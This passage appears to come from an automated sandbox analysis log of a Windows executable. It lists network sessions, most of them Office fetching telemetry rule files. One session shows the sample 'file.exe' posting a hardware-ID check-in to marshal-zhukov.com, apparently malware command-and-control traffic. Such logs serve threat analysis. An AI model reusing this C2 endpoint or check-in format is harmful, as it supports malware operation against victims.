                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              69192.168.2.104977913.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:52 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:52 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:52 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 502
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BB6A0D312"
                                                                                                                                                                                                                                                              x-ms-request-id: 63854d8c-901e-007b-2581-3fac50000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153152Z-174f7845968cpnpfhC1EWR3afc0000000wug000000003wcs
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:52 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              70192.168.2.104978013.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:52 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:53 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 407
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582B9D30478D"
                                                                                                                                                                                                                                                              x-ms-request-id: 14d8e695-801e-008c-6b91-3f7130000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153153Z-174f7845968l4kp6hC1EWRe8840000000xe00000000058fc
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:53 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              71192.168.2.104978113.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:53 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:53 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 474
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BB3F48DAE"
                                                                                                                                                                                                                                                              x-ms-request-id: a2105f9f-201e-00aa-1591-3f3928000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153153Z-174f7845968xlwnmhC1EWR0sv80000000wwg00000000m373
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:53 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              72192.168.2.1049783172.67.160.804438100C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:53 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 87
                                                                                                                                                                                                                                                              Host: marshal-zhukov.com
                                                                                                                                                                                                                                                              2024-11-27 15:31:53 UTC87OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 69 63 26 6a 3d 26 68 77 69 64 3d 37 30 30 43 30 37 45 30 34 38 36 37 35 41 44 44 34 45 33 33 45 43 42 36 31 41 39 30 37 39 35 43
                                                                                                                                                                                                                                                              Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTrafic&j=&hwid=700C07E048675ADD4E33ECB61A90795C
                                                                                                                                                                                                                                                              2024-11-27 15:31:55 UTC1041INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:55 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=oauftku3ilpq9jqfo9a92tu1sl; expires=Sun, 23-Mar-2025 09:18:33 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Leo246aQVrLtBZf4YiDj9MIFn7ea1%2BQdtH3Sz%2Fz7cvSjDh2fiub%2FWSmBKfgjDdisMjpuITy82zswingTxMbVUhFlPiR%2BGTTO8aYkdlFKEL7u0LiQlWGNRIcsRKPCEi75cHFdUwM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8e932af45e3bc333-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1656&min_rtt=1650&rtt_var=632&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=989&delivery_rate=1713615&cwnd=143&unsent_bytes=0&cid=d10284e0a897d4ab&ts=2402&x=0"
                                                                                                                                                                                                                                                              2024-11-27 15:31:55 UTC130INData Raw: 37 63 0d 0a 64 6e 4b 63 53 64 38 4e 76 36 52 75 44 4e 4f 72 57 67 52 66 57 55 67 65 32 58 63 68 62 59 47 39 74 4d 45 67 59 39 58 75 52 58 63 74 43 62 34 38 2f 54 65 64 7a 42 70 34 6f 35 45 47 4b 77 4e 32 65 53 62 73 57 52 4e 63 74 4a 4f 46 38 42 4e 4e 35 4e 67 5a 57 42 6b 55 2b 68 58 77 61 64 72 43 51 47 6d 72 7a 6e 67 6f 66 54 38 38 50 4f 4e 48 44 55 2f 6b 6e 34 37 77 58 54 34 3d 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 7cdnKcSd8Nv6RuDNOrWgRfWUge2XchbYG9tMEgY9XuRXctCb48/TedzBp4o5EGKwN2eSbsWRNctJOF8BNN5NgZWBkU+hXwadrCQGmrzngofT88PONHDU/kn47wXT4=
                                                                                                                                                                                                                                                              2024-11-27 15:31:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              73192.168.2.104978213.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:53 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:54 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:53 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 408
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BB9B6040B"
                                                                                                                                                                                                                                                              x-ms-request-id: 97970dc3-901e-008f-6c91-3f67a6000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153153Z-174f7845968glpgnhC1EWR7uec0000000x7g00000000kfed
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:54 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              74192.168.2.104978413.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:54 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:54 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:54 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 469
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BB3CAEBB8"
                                                                                                                                                                                                                                                              x-ms-request-id: d3508ca6-601e-003d-4e91-3f6f25000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153154Z-174f78459688l8rvhC1EWRtzr000000009s0000000009vpt
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:54 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              75192.168.2.104978513.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:54 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:55 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:55 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 416
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BB5284CCE"
                                                                                                                                                                                                                                                              x-ms-request-id: 8b39e191-d01e-0065-5191-3fb77a000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153155Z-174f7845968kvnqxhC1EWRmf3g0000000ftg00000000r5yd
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:55 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              76192.168.2.104978613.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:55 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:55 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:55 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 472
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582B91EAD002"
                                                                                                                                                                                                                                                              x-ms-request-id: 77f1aa82-301e-003f-6391-3f266f000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153155Z-174f7845968j6t2phC1EWRcfe80000000x9000000000c126
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:55 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              77192.168.2.104978713.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:55 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:55 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:55 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 432
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BAABA2A10"
                                                                                                                                                                                                                                                              x-ms-request-id: da27d7c4-b01e-005c-4391-3f4c66000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153155Z-174f7845968xr5c2hC1EWRd0hn0000000e1g000000004g35
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
